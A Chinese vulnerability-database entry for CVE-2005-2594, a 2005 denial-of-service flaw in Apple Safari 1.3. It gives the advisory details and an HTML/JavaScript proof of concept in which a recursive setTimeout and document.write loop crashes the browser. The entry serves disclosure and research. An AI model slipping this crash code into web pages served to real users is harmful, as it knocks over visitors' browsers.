Apple Safari Web浏览器拒绝服务漏洞-安全小百科

Apple Safari Web浏览器拒绝服务漏洞

漏洞ID	1108983	漏洞类型	设计错误
发布时间	2005-08-09	更新时间	2005-10-20
CVE编号	CVE-2005-2594	CNNVD-ID	CNNVD-200508-182
漏洞平台	OSX	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/26128
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-182

|漏洞详情

Safari是MacOSX默认的网页浏览器。AppleSafariWeb浏览器在执行某些JavaScript操作时存在拒绝服务漏洞，远程攻击者可以通过无效的内存访问异常导致WEB浏览器崩溃。目前漏洞起因不详。

|漏洞EXP

source: http://www.securityfocus.com/bid/14528/info

Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs certain JavaScript operations.

The exact cause of this issue is currently unknown. This BID will be updated as further information is disclosed.

This vulnerability allows remote attackers to crash affected Web browsers by causing an invalid memory access exception.

Safari version 1.3 is reported susceptible to this issue. Other versions may also be affected. 

<html>
<script name="JavaScript">
<!--

function tickTock()
{
setTimeout("tickTock()", 1000);
thisTime = new Date()
seconds = thisTime.getSeconds()
document.write(seconds);
}

// -->
</script>

<body onLoad="tickTock();">
</html>

|参考资料

来源:BID
名称:14528
链接:http://www.securityfocus.com/bid/14528
来源:BUGTRAQ
名称:20050809AppleSafari&Javascript-KERN;_INVALID_ADDRESS(0x0001)
链接:http://www.securityfocus.com/archive/1/407702

相关推荐: INND/NNRP < 1.6.x - Remote Overflow

INND/NNRP < 1.6.x – Remote Overflow 漏洞ID 1053494 漏洞类型发布时间 2000-11-30 更新时间 2000-11-30 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Linux CVSS评分 …

文章版权归作者所有，未经允许请勿转载。

THE END